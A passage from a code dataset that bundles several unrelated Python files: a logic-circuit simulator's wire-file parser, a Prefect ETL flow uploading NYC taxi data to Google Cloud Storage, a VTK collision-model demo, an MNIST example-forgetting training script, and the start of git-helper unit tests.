'--genTemplate' argument is currently not supported\")\r\n global genTemplate\r\n genTemplate = True\r\n arg_ptr += 1\r\n continue\r\n\r\n # Sets the tick amount for the simulator to run\r\n if (sys.argv[arg_ptr] == \"--run\"):\r\n global tick_count\r\n tick_count = sys.argv[arg_ptr + 1]\r\n arg_ptr += 2\r\n continue\r\n\r\n # Sets the wire_filename is the simulator will run\r\n if (sys.argv[arg_ptr] == \"--wire\"):\r\n global wire_filename\r\n wire_filename = sys.argv[arg_ptr + 1]\r\n arg_ptr += 2\r\n continue\r\n\r\n # Sets the input file that the simluator will use for inputs\r\n if (sys.argv[arg_ptr] == \"--input\"):\r\n global input_filename\r\n input_filename = sys.argv[arg_ptr + 1]\r\n arg_ptr += 2\r\n continue\r\n\r\n # NOT supported right 
now\r\n if (sys.argv[arg_ptr] == \"--debug\"):\r\n global debug\r\n debug = sys.argv[arg_ptr + 1]\r\n arg_ptr += 2\r\n continue\r\n\r\n # TODO: Auto gen input\r\n if (sys.argv[arg_ptr] == \"--auto\"):\r\n global auto\r\n auto = True\r\n arg_ptr += 1\r\n continue\r\n\r\n # Additional arguments place under here\r\n\r\n # Print the argument fields to verify its working\r\n print(\"\\n############################################################################\\n\")\r\n\r\n print(\"Wire File: \" + str(wire_filename.split(\"/\")[-1]))\r\n print(\"Input File: \" + str(input_filename))\r\n print(\"Tick Count: \" + str(tick_count))\r\n print(\"Reset: \" + str(reset))\r\n print(\"Debug: \" + str(debug))\r\n print(\"Generate Template: \" + str(genTemplate))\r\n print(\"Auto: \" + str(auto))\r\n\r\n print(\"\\n############################################################################\\n\")\r\n\r\n'''\r\nFunction: parse_wire_file()\r\nPurpose: Parses the components of the wire file and \r\n\r\nUpdates: 3/1/2020 - Removed wire file parsing from main() and moved to own function - Dilen Govin\r\n'''\r\ndef parse_wire_file():\r\n try:\r\n # Open the file\r\n file = open(wire_filename, \"r\")\r\n\r\n # Initializa bit dictionary using Python built in dictionary\r\n # Store read-write values in an array for now\r\n # TODO: Make a custom data structure to model READ-WRITE?\r\n # TODO: Make a custom data structure to model this?\r\n \r\n global outputs\r\n global inputs\r\n\r\n global logic_ops\r\n global constants\r\n global memory\r\n \r\n # Read the first line to initialize while loop\r\n line = file.readline()\r\n\r\n while line:\r\n # Avoid comment lines in .wire files\r\n if (line[0] == \"#\"):\r\n line = file.readline()\r\n continue\r\n\r\n # Catches empty and new lines\r\n if (line == \"\\n\" or line == \"\"):\r\n line = file.readline()\r\n continue\r\n\r\n # Extracts total bit size from .wire file\r\n if (line.startswith(\"bits\")):\r\n bits = int(line.split()[1])\r\n line = file.readline()\r\n continue\r\n\r\n if line.startswith(\"memory count\"):\r\n # parse_memory()\r\n mem_count = int(line.split()[2])\r\n line = parse_memory(mem_count, file)\r\n\r\n continue\r\n\r\n if line.startswith(\"logic count\"):\r\n # parse_logic_ops()\r\n logic_count = int(line.split()[2])\r\n line = parse_logic_ops(logic_count, file)\r\n\r\n continue\r\n\r\n if line.startswith(\"connection count\"):\r\n # parse_connections()\r\n conn_count = int(line.split()[2])\r\n line = parse_connections(conn_count, file)\r\n\r\n continue\r\n\r\n if line.startswith(\"i/o count\"):\r\n io_count = int(line.split()[2])\r\n line = parse_io(io_count, file)\r\n\r\n continue\r\n\r\n if line.startswith(\"constant count\"):\r\n constant_count = int(line.split()[2])\r\n line = parse_constants(constant_count, file)\r\n\r\n continue\r\n\r\n line = file.readline()\r\n\r\n file.close()\r\n\r\n if (auto):\r\n print(bit_dictionary.get_test_str())\r\n else:\r\n print(bit_dictionary)\r\n\r\n for logic_op in logic_ops:\r\n print(logic_ops[logic_op])\r\n\r\n print(\"INPUTS: \")\r\n\r\n for input_bit in inputs:\r\n print(input_bit)\r\n\r\n print(\"OUTPUTS: \")\r\n\r\n for output in outputs:\r\n print(output)\r\n\r\n print(\"\\n############################################################################\\n\")\r\n\r\n\r\n except IOError:\r\n print(\"ERROR: Unable to find or open \" + wire_filename)\r\n exit(1)\r\n\r\ndef parse_memory(mem_count, file):\r\n line = file.readline()\r\n\r\n for mem in range(mem_count):\r\n mem_info = line.split()\r\n\r\n size = 
int(mem_info[2])\r\n read = int(mem_info[4])\r\n write = int(mem_info[6])\r\n\r\n # Build keys for dictionary\r\n reader_key = (read , size) # out val\r\n writer_key = (write, size) # in val\r\n\r\n '''\r\n NOTE: Memory size is relative to the size of what it holds. So a size of 1 means the memory holds 1\r\n bit of information. Since there is a mem latch in the memory object, the actual mem bit size\r\n is double the size in the .wire file.\r\n '''\r\n\r\n mem_obj = Memory(size);\r\n\r\n memory[(reader_key, writer_key)] = mem_obj\r\n \r\n print(mem_obj)\r\n\r\n line = file.readline()\r\n \r\n return line\r\n\r\ndef parse_logic_ops(logic_count, file):\r\n line = file.readline()\r\n\r\n for logic in range(logic_count):\r\n logic_info = line.split()\r\n \r\n if (logic_info[1] == \"NOT\"):\r\n size = int(logic_info[3])\r\n a = int(logic_info[5])\r\n out = int(logic_info[7])\r\n\r\n # Build keys for dictionary\r\n reader_a_key = (a , size)\r\n writer_key = (out, size)\r\n\r\n # Parse \"to\" bit\r\n result = bit_dictionary.addWriter(writer_key)\r\n\r\n if not result:\r\n print(\"Short circuit detected @ \" + line)\r\n exit(1)\r\n\r\n # Create NOT Object for LogicOp\r\n not_obj = NOT(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"NOT-\" + str(writer_key))\r\n\r\n # Parse from side (default arg locks in this iteration's not_obj when using lambda)\r\n bit_dictionary.addReader(reader_a_key, lambda val, obj=not_obj: obj.deliver_a(val))\r\n\r\n logic_ops[not_obj.getName()] = not_obj\r\n\r\n else:\r\n size = int(logic_info[3])\r\n a = int(logic_info[5])\r\n b = int(logic_info[7])\r\n out = int(logic_info[9])\r\n\r\n # Build keys for dictionary\r\n reader_a_key = (a , size)\r\n reader_b_key = (b , size)\r\n writer_key = (out, size)\r\n\r\n # Parse \"to\" bit\r\n result = bit_dictionary.addWriter(writer_key)\r\n\r\n if not result:\r\n print(\"Short circuit detected @ \" + line)\r\n exit(1)\r\n\r\n if logic_info[1] == \"AND\":\r\n # Create AND Object for LogicOp\r\n logic_obj = AND(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"AND-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"OR\":\r\n # Create OR Object for LogicOp\r\n logic_obj = OR(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"OR-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"XOR\":\r\n # Create XOR Object for LogicOp\r\n logic_obj = XOR(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"XOR-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"EQ\":\r\n # Create EQ object for LogicOp\r\n logic_obj = EQ(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"EQ-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"NEQ\":\r\n # Create NEQ object for LogicOp\r\n logic_obj = NEQ(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"NEQ-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"GT\":\r\n # Create GT object for LogicOp\r\n logic_obj = GT(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"GT-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"GE\":\r\n # Create GE object for LogicOp\r\n logic_obj = GE(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"GE-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"LT\":\r\n # Create LT object for LogicOp\r\n logic_obj = LT(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"LT-\" + 
str(writer_key))\r\n\r\n elif logic_info[1] == \"LE\":\r\n # Create EQ object for LogicOp\r\n logic_obj = LE(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"LE-\" + str(writer_key))\r\n\r\n else:\r\n print(\"ERROR: Logic object not yet supported\")\r\n exit(1)\r\n\r\n # Parse from side\r\n bit_dictionary.addReader(reader_a_key, lambda val: logic_obj.deliver_a(val))\r\n bit_dictionary.addReader(reader_b_key, lambda val: logic_obj.deliver_b(val))\r\n\r\n logic_ops[logic_obj.getName()] = logic_obj\r\n\r\n line = file.readline()\r\n\r\n return line\r\n\r\ndef parse_connections(connCount, file):\r\n line = file.readline()\r\n\r\n for conn in range(connCount):\r\n connInfo = line.split()\r\n \r\n size = int(connInfo[2])\r\n toBit = int(connInfo[4])\r\n fromBit = int(connInfo[6])\r\n\r\n reader_key = (fromBit, size)\r\n writer_key = (toBit , size)\r\n\r\n # Parse \"to\" side\r\n global result \r\n result = bit_dictionary.addWriter(writer_key)\r\n\r\n if not result:\r\n print(\"Short circuit detected @ \" + line)\r\n exit(1)\r\n\r\n # Parse \"from\" side\r\n bit_dictionary.addReader(reader_key, make_conn(writer_key))\r\n\r\n line = file.readline()\r\n \r\n return line\r\n\r\ndef parse_io(ioCount, file):\r\n line = file.readline()\r\n\r\n for io in range(ioCount):\r\n ioInfo = line.split()\r\n \r\n if (ioInfo[0] == \"input\"):\r\n size = int(ioInfo[2])\r\n inBit = int(ioInfo[4])\r\n\r\n writer_key = (inBit, size)\r\n\r\n bit_dictionary.addWriter(writer_key)\r\n inputs.append(writer_key)\r\n\r\n if not result:\r\n print(\"Short circuit detected @ \" + line)\r\n exit(1)\r\n\r\n else:\r\n size = int(ioInfo[2])\r\n outBit = int(ioInfo[4])\r\n\r\n reader_key = (outBit, size)\r\n output_obj = Output(\"OUT-\" + str(reader_key))\r\n\r\n # THIS IS WEIRD:\r\n # So print(x) works on Windows but it doesnt work on Mac\r\n # sys.stdout.write(x) works on Mac though\r\n #\r\n # https://stackoverflow.com/questions/2970858/why-doesnt-print-work-in-a-lambda\r\n bit_dictionary.addReader(reader_key, lambda val: sys.stdout.write(\"OUTPUT: \" + str(val) + \"\\n\")) #lambda val: output_obj.deliver_val(val))\r\n outputs.append(reader_key)\r\n\r\n line = file.readline()\r\n \r\n return line\r\n\r\ndef parse_constants(constantCount, file):\r\n line = file.readline()\r\n\r\n for constant in range(constantCount):\r\n constantInfo = line.split()\r\n\r\n size = int(constantInfo[2])\r\n fromBit = int(constantInfo[4])\r\n value = int(constantInfo[6])\r\n\r\n writer_key = (fromBit, size)\r\n\r\n # Add to bit dictionary\r\n bit_dictionary.addWriter(writer_key)\r\n constants[writer_key] = value\r\n\r\n line = file.readline()\r\n \r\n return line\r\n\r\n# Needed to lock values when using lambda\r\ndef make_conn(writer_key):\r\n return lambda val: [reader(val) for reader in bit_dictionary.get_readers(writer_key)]\r\n\r\nmain()\r\n","repo_name":"russ-lewis/HWC","sub_path":"hwcSim_py/sim_main.py","file_name":"sim_main.py","file_ext":"py","file_size_in_byte":21472,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"9624221250","text":"from datetime import timedelta\nfrom pathlib import Path\nfrom typing import Union\n\nimport click\nimport pandas as pd\nfrom prefect import flow, task\nfrom prefect.tasks import task_input_hash\nfrom prefect_gcp.cloud_storage import GcsBucket\n\nDATA_DIR = Path(\n Path(__file__).parent.absolute().parent,\n \"data\"\n)\nGCS_BUCKET_BLOCK_NAME = \"gcs-de-zoomcamp-bucket\"\n\n\n@task(log_prints=True, retries=3, 
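The make_conn() helper near the end of the file exists because Python closures capture variables, not values: a lambda built inline in the parse loop would see whatever writer_key holds after the loop finishes. (The deliver_a/deliver_b lambdas in parse_logic_ops close over logic_obj the same way, so they are exposed to the same late-binding behavior.) A self-contained demonstration of the pitfall and the factory-function fix:

handlers = [lambda: key for key in ("a", "b", "c")]
print([h() for h in handlers])    # ['c', 'c', 'c'] -- every lambda shares one 'key'

def make_handler(key):            # the factory freezes the current value
    return lambda: key

handlers = [make_handler(key) for key in ("a", "b", "c")]
print([h() for h in handlers])    # ['a', 'b', 'c']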
cache_key_fn=task_input_hash, cache_expiration=timedelta(days=1))\ndef web_to_pandas(url: str) -> pd.DataFrame:\n \"\"\"Load dataset from web to pandas DataFrame\"\"\"\n df = pd.read_csv(url)\n print(f\"Loaded {df.shape[0]:,d} rows to pandas DataFrame.\")\n return df\n\n\n@task\ndef process_dataset(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Preprocess dataset inplace\"\"\"\n\n # modify boolean flag:\n if \"store_and_fwd_flag\" in df.columns:\n df.store_and_fwd_flag = df.store_and_fwd_flag.map({\"Y\": True, \"N\": False})\n\n # format dates:\n date_cols = [i for i in df.columns if i.endswith(\"_datetime\")]\n for col in date_cols:\n df[col] = pd.to_datetime(df[col])\n\n # column names to lowercase:\n df.columns = [i.lower() for i in df.columns]\n return df\n\n\n@task(log_prints=True)\ndef pandas_to_parquet(df: pd.DataFrame, parquet_filepath: Union[Path, str]):\n \"\"\"Save pandas DataFrame locally to .parquet file\"\"\"\n if not str(parquet_filepath).endswith(\".parquet\"):\n raise ValueError(f\"Only .parquet file type is allowed\")\n\n if not parquet_filepath.parent.exists():\n parquet_filepath.parent.mkdir(parents=True)\n\n df.to_parquet(parquet_filepath, compression=\"gzip\")\n print(f\"There are {df.shape[0]:,d} rows saved to {parquet_filepath.name}\")\n\n\n@task(log_prints=True)\ndef parquet_to_gcs_bucket(\n parquet_filepath: Union[Path, str],\n gcs_bucket_block_name: str\n) -> Union[Path, str]:\n \"\"\"Download local parquet file to Google Cloud Storage bucket\"\"\"\n gcp_bucket_block = GcsBucket.load(gcs_bucket_block_name)\n gcs_path = gcp_bucket_block.upload_from_path(\n from_path=parquet_filepath,\n to_path=parquet_filepath.name\n )\n print(f\"Successfully loaded to GCS Bucket. Path: `{gcs_path}`\")\n return gcs_path\n\n\n@flow\ndef etl_web_to_gcs(taxi_color: str, year: int, month: int):\n \"\"\"ETL flow to load data from web URL to Google Cloud Storage Bucket\"\"\"\n # web -> DataFrame\n taxi_data_url = (\n \"https://github.com/DataTalksClub/nyc-tlc-data/releases/download/\"\n f\"{taxi_color}/{taxi_color}_tripdata_{year}-{month:02d}.csv.gz\"\n )\n df = web_to_pandas(url=taxi_data_url)\n\n # preprocessing\n df = process_dataset(df)\n\n # DataFrame -> .parquet\n parquet_filepath = Path(DATA_DIR, f\"{taxi_color}_taxi_trips_{year}_{month:02d}.parquet\")\n pandas_to_parquet(df, parquet_filepath=parquet_filepath)\n\n # local .parquet -> Google Cloud Storage Bucket\n parquet_to_gcs_bucket(parquet_filepath, GCS_BUCKET_BLOCK_NAME)\n\n\n\n@click.command\n@click.option(\"--taxi_color\",\n type=str,\n help=\"Color of the taxi cabs\")\n@click.option(\"--year\",\n type=int,\n help=\"Year of a taxi trip\")\n@click.option(\"--month\",\n type=int,\n help=\"Month of a taxi trip\")\ndef etl_web_to_gcs_command(taxi_color: str, year: int, month: int):\n \"\"\"CLI command to get load data from web url to Google Cloud Storage bucket\"\"\"\n etl_web_to_gcs(taxi_color, year, month)\n\n\nif __name__ == \"__main__\":\n etl_web_to_gcs_command()\n","repo_name":"garistvlad/data-engineering-zoomcamp","sub_path":"week-2/prefect-src/flows/etl_web_to_gcs.py","file_name":"etl_web_to_gcs.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"420916173","text":"\nimport vtk\nimport vtkesqui\n\n# Data source\nsphere = vtk.vtkSphereSource()\nsphere.SetPhiResolution(12)\nsphere.SetThetaResolution(12)\nsphere.Update()\n\n#Define model input and source\ninput = sphere.GetOutput()\nsource = 
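The flow above can be driven either through its click wrapper or as a direct Python call; the yellow-taxi/January-2021 arguments here are illustrative only:

#   python etl_web_to_gcs.py --taxi_color yellow --year 2021 --month 1

from etl_web_to_gcs import etl_web_to_gcs   # module name assumed from the file name

if __name__ == "__main__":
    etl_web_to_gcs(taxi_color="yellow", year=2021, month=1)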
vtk.vtkPolyData()\nsource.DeepCopy(input)\n\n#Smooth (deform) source mesh\nsmooth = vtk.vtkSmoothPolyDataFilter()\nsmooth.SetInput(source)\nsmooth.SetNumberOfIterations(200)\n\n#Model input mesh will be adapted to the source\nmodel = vtkesqui.vtkCollisionModel()\nmodel.SetInput(input)\nmodel.SetSource(smooth.GetOutput())\nmodel.SetColor(0.5 ,0.5 , 1.0)\nmodel.SetRadius(0.01)\n\n#A call to update method is made to force the model to be at its last state\nmodel.Update();\n\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# Display original mesh\nm = vtk.vtkPolyDataMapper()\nm.SetInput(source)\na = vtk.vtkActor()\na.SetMapper(m)\na.GetProperty().SetOpacity(0.5)\nren.AddActor(a)\n\n# Display model output (smoothed polydata)\nactor = model.GetActor()\nren.AddActor(actor)\n\nren.SetBackground(0.3, 0.6, 0.3)\nrenWin.SetSize(500, 500)\n\nren.ResetCamera()\nren.GetActiveCamera().Azimuth(45)\niren.Initialize()\n\nrenWin.Render()\n\niren.Start()\n","repo_name":"Motiva/vtkESQui","sub_path":"Examples/CollisionDetection/Python/CollisionModel.py","file_name":"CollisionModel.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"23419332298","text":"from __future__ import print_function\nimport argparse\nimport numpy as np\nimport numpy.random as npr\nimport time\nimport os\nimport sys\nimport pickle\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom torchvision import datasets, transforms\n\n\n# Format time for printing purposes\ndef get_hms(seconds):\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n\n return h, m, s\n\n\n# Setup basic CNN model\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(320, 50)\n self.fc2 = nn.Linear(50, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n\n if args.no_dropout:\n x = F.relu(F.max_pool2d(self.conv2(x), 2))\n else:\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n\n if not args.no_dropout:\n x = F.dropout(x, training=self.training)\n\n x = self.fc2(x)\n return F.log_softmax(x, dim=1)\n\n\n# Train model for one epoch\n#\n# example_stats: dictionary containing statistics accumulated over every presentation of example\n#\ndef train(args, model, device, trainset, optimizer, epoch, example_stats):\n train_loss = 0\n correct = 0\n total = 0\n batch_size = args.batch_size\n\n model.train()\n\n # Get permutation to shuffle trainset\n trainset_permutation_inds = npr.permutation(\n np.arange(len(trainset.train_labels)))\n\n for batch_idx, batch_start_ind in enumerate(\n range(0, len(trainset.train_labels), batch_size)):\n\n # Get trainset indices for batch\n batch_inds = trainset_permutation_inds[batch_start_ind:\n batch_start_ind + batch_size]\n\n # Get batch inputs and targets, transform them appropriately\n transformed_trainset = []\n for ind in batch_inds:\n transformed_trainset.append(trainset.__getitem__(ind)[0])\n inputs = torch.stack(transformed_trainset)\n targets = torch.LongTensor(\n np.array(trainset.train_labels)[batch_inds].tolist())\n\n # Map to available device\n inputs, targets = inputs.to(device), targets.to(device)\n\n # Forward 
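The hard-coded x.view(-1, 320) in Net follows from MNIST geometry: a 28×28 input shrinks to 24 after the first 5×5 convolution, 12 after pooling, 8 after the second convolution, and 4 after pooling again, so the flattened size is 20 channels × 4 × 4 = 320. A quick standalone check of that arithmetic:

import torch
import torch.nn as nn
import torch.nn.functional as F

conv1, conv2 = nn.Conv2d(1, 10, 5), nn.Conv2d(10, 20, 5)
x = torch.zeros(1, 1, 28, 28)          # one MNIST-sized image
x = F.max_pool2d(conv1(x), 2)          # -> (1, 10, 12, 12)
x = F.max_pool2d(conv2(x), 2)          # -> (1, 20, 4, 4)
assert x.numel() == 320                # matches x.view(-1, 320)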
propagation, compute loss, get predictions\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n _, predicted = torch.max(outputs.data, 1)\n\n # Update statistics and loss\n acc = predicted == targets\n for j, index in enumerate(batch_inds):\n\n # Get index in original dataset (not sorted by forgetting)\n index_in_original_dataset = train_indx[index]\n\n # Compute missclassification margin\n output_correct_class = outputs.data[\n j, targets[j].item()] # output for correct class\n sorted_output, _ = torch.sort(outputs.data[j, :])\n if acc[j]:\n # Example classified correctly, highest incorrect class is 2nd largest output\n output_highest_incorrect_class = sorted_output[-2]\n else:\n # Example misclassified, highest incorrect class is max output\n output_highest_incorrect_class = sorted_output[-1]\n margin = output_correct_class.item(\n ) - output_highest_incorrect_class.item()\n\n # Add the statistics of the current training example to dictionary\n index_stats = example_stats.get(index_in_original_dataset,\n [[], [], []])\n index_stats[0].append(loss[j].item())\n index_stats[1].append(acc[j].sum().item())\n index_stats[2].append(margin)\n example_stats[index_in_original_dataset] = index_stats\n\n # Update loss, backward propagate, update optimizer\n loss = loss.mean()\n train_loss += loss.item()\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n loss.backward()\n optimizer.step()\n\n sys.stdout.write('\\r')\n sys.stdout.write(\n '| Epoch [%3d/%3d] Iter[%3d/%3d]\\t\\tLoss: %.4f Acc@1: %.3f%%' %\n (epoch, args.epochs, batch_idx + 1,\n (len(trainset) // batch_size) + 1, loss.item(),\n 100. * correct.item() / total))\n sys.stdout.flush()\n\n # Add training accuracy to dict\n index_stats = example_stats.get('train', [[], []])\n index_stats[1].append(100. * correct.item() / float(total))\n example_stats['train'] = index_stats\n\n\n# Evaluate model predictions on heldout test data\n#\n# example_stats: dictionary containing statistics accumulated over every presentation of example\n#\ndef test(args, model, device, testset, example_stats):\n test_loss = 0\n correct = 0\n total = 0\n test_batch_size = 32\n\n model.eval()\n\n for batch_idx, batch_start_ind in enumerate(\n range(0, len(testset.test_labels), test_batch_size)):\n\n # Get batch inputs and targets\n transformed_testset = []\n for ind in range(\n batch_start_ind,\n min(\n len(testset.test_labels),\n batch_start_ind + test_batch_size)):\n transformed_testset.append(testset.__getitem__(ind)[0])\n inputs = torch.stack(transformed_testset)\n targets = torch.LongTensor(\n np.array(testset.test_labels)[batch_start_ind:batch_start_ind +\n test_batch_size].tolist())\n\n # Map to available device\n inputs, targets = inputs.to(device), targets.to(device)\n\n # Forward propagation, compute loss, get predictions\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n loss = loss.mean()\n test_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n\n # Add test accuracy to dict\n acc = 100. * correct.item() / total\n index_stats = example_stats.get('test', [[], []])\n index_stats[1].append(100. 
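The misclassification margin computed above is the correct-class output minus the highest other output. On a concrete four-class example where class 2 is both the target and the prediction:

import torch

logits = torch.tensor([0.1, -0.3, 2.0, 0.9])
sorted_out, _ = torch.sort(logits)
correct = logits[2].item()             # 2.0, the correct class
runner_up = sorted_out[-2].item()      # 0.9, highest incorrect class
print(correct - runner_up)             # margin = 1.1 (positive: classified correctly)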
* correct.item() / float(total))\n example_stats['test'] = index_stats\n print(\"\\n| Validation Epoch #%d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\" %\n (epoch, loss.item(), acc))\n\n\nparser = argparse.ArgumentParser(description='training MNIST')\nparser.add_argument(\n '--dataset',\n default='mnist',\n help='dataset to use, can be mnist or permuted_mnist')\nparser.add_argument(\n '--batch_size',\n type=int,\n default=64,\n metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument(\n '--epochs',\n type=int,\n default=200,\n metavar='N',\n help='number of epochs to train (default: 200)')\nparser.add_argument(\n '--lr',\n type=float,\n default=0.01,\n metavar='LR',\n help='learning rate (default: 0.01)')\nparser.add_argument(\n '--momentum',\n type=float,\n default=0.5,\n metavar='M',\n help='SGD momentum (default: 0.5)')\nparser.add_argument(\n '--no_cuda',\n action='store_true',\n default=False,\n help='disables CUDA training')\nparser.add_argument(\n '--seed',\n type=int,\n default=1,\n metavar='S',\n help='random seed (default: 1)')\nparser.add_argument(\n '--sorting_file',\n default=\"none\",\n help=\n 'name of a file containing order of examples sorted by a certain metric (default: \"none\", i.e. not sorted)'\n)\nparser.add_argument(\n '--remove_n',\n type=int,\n default=0,\n help='number of sorted examples to remove from training')\nparser.add_argument(\n '--keep_lowest_n',\n type=int,\n default=0,\n help=\n 'number of sorted examples to keep that have the lowest metric score, equivalent to start index of removal; if a negative number given, remove random draw of examples'\n)\nparser.add_argument(\n '--no_dropout', action='store_true', default=False, help='remove dropout')\nparser.add_argument(\n '--input_dir',\n default='mnist_results/',\n help='directory where to read sorting file from')\nparser.add_argument(\n '--output_dir', required=True, help='directory where to save results')\n\n# Enter all arguments that you want to be in the filename of the saved output\nordered_args = [\n 'dataset', 'no_dropout', 'seed', 'sorting_file', 'remove_n',\n 'keep_lowest_n'\n]\n\n# Parse arguments and setup name of output file with forgetting stats\nargs = parser.parse_args()\nargs_dict = vars(args)\nprint(args_dict)\nsave_fname = '__'.join(\n '{}_{}'.format(arg, args_dict[arg]) for arg in ordered_args)\n\n# Set appropriate devices\nuse_cuda = not args.no_cuda and torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nkwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n# Set random seed for initialization\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n torch.cuda.manual_seed(args.seed)\nnpr.seed(args.seed)\n\n# Setup transforms\nall_transforms = [\n transforms.ToTensor(),\n transforms.Normalize((0.1307, ), (0.3081, ))\n]\nif args.dataset == 'permuted_mnist':\n pixel_permutation = torch.randperm(28 * 28)\n all_transforms.append(\n transforms.Lambda(\n lambda x: x.view(-1, 1)[pixel_permutation].view(1, 28, 28)))\ntransform = transforms.Compose(all_transforms)\n\nos.makedirs(args.output_dir, exist_ok=True)\n\n# Load the appropriate train and test datasets\ntrainset = datasets.MNIST(\n root='/tmp/data', train=True, download=True, transform=transform)\ntestset = datasets.MNIST(\n root='/tmp/data', train=False, download=True, transform=transform)\n\n# Get indices of examples that should be used for training\nif args.sorting_file == 'none':\n train_indx = np.array(range(len(trainset.train_labels)))\nelse:\n try:\n with 
open(\n os.path.join(args.input_dir, args.sorting_file) + '.pkl',\n 'rb') as fin:\n ordered_indx = pickle.load(fin)['indices']\n except IOError:\n with open(os.path.join(args.input_dir, args.sorting_file),\n 'rb') as fin:\n ordered_indx = pickle.load(fin)['indices']\n\n # Get the indices to remove from training\n elements_to_remove = np.array(\n ordered_indx)[args.keep_lowest_n:args.keep_lowest_n + args.remove_n]\n\n # Remove the corresponding elements\n train_indx = np.setdiff1d(\n range(len(trainset.train_labels)), elements_to_remove)\n\n# Remove remove_n number of examples from the train set at random\nif args.keep_lowest_n < 0:\n train_indx = npr.permutation(np.arange(len(\n trainset.train_labels)))[:len(trainset.train_labels) - args.remove_n]\n\n# Reassign train data and labels\ntrainset.train_data = trainset.train_data[train_indx, :, :]\ntrainset.train_labels = np.array(trainset.train_labels)[train_indx].tolist()\n\nprint('Training on ' + str(len(trainset.train_labels)) + ' examples')\n\n# Setup model and optimizer\nmodel = Net().to(device)\noptimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n\n# Setup loss\ncriterion = nn.CrossEntropyLoss()\ncriterion.__init__(reduce=False)\n\n# Initialize dictionary to save statistics for every example presentation\nexample_stats = {}\n\nelapsed_time = 0\nfor epoch in range(args.epochs):\n start_time = time.time()\n\n train(args, model, device, trainset, optimizer, epoch, example_stats)\n test(args, model, device, testset, example_stats)\n\n epoch_time = time.time() - start_time\n elapsed_time += epoch_time\n print('| Elapsed time : %d:%02d:%02d' % (get_hms(elapsed_time)))\n\n # Save the stats dictionary\n fname = os.path.join(args.output_dir, save_fname)\n with open(fname + \"__stats_dict.pkl\", \"wb\") as f:\n pickle.dump(example_stats, f)\n\n # Log the best train and test accuracy so far\n with open(fname + \"__best_acc.txt\", \"w\") as f:\n f.write('train test \\n')\n f.write(str(max(example_stats['train'][1])))\n f.write(' ')\n f.write(str(max(example_stats['test'][1])))\n","repo_name":"mtoneva/example_forgetting","sub_path":"run_mnist.py","file_name":"run_mnist.py","file_ext":"py","file_size_in_byte":12173,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"5"} +{"seq_id":"25445087807","text":"import os\nimport shutil\nimport unittest\nfrom unittest.mock import Mock, patch, call\nfrom git.exc import GitCommandError, InvalidGitRepositoryError\nfrom repository import (\n CommitNotValidException,\n RepoNotValidException,\n clone_github_repository,\n checkout_to_commit\n)\n\n\nclass TestGitFunctions(unittest.TestCase):\n\n def setUp(self):\n self.repo_url = \"https://github.com/example/repo.git\"\n self.destination_dir = \"test_repo\"\n self.commit_hash = \"abcd1234\"\n\n def tearDown(self):\n if os.path.isdir(self.destination_dir):\n shutil.rmtree(self.destination_dir)\n\n @patch('repository.git.Repo')\n def test_clone_github_repository(self, mock_repo):\n # Test cloning a valid repository\n expected_calls = [call.clone_from(self.repo_url, self.destination_dir)]\n\n clone_github_repository(self.repo_url, self.destination_dir)\n\n mock_repo.assert_has_calls(expected_calls)\n\n @patch('repository.git.Repo.clone_from')\n def test_clone_github_repository_existing_directory(self, mock_clone_from):\n clone_github_repository(self.repo_url, 'tests/repository')\n\n 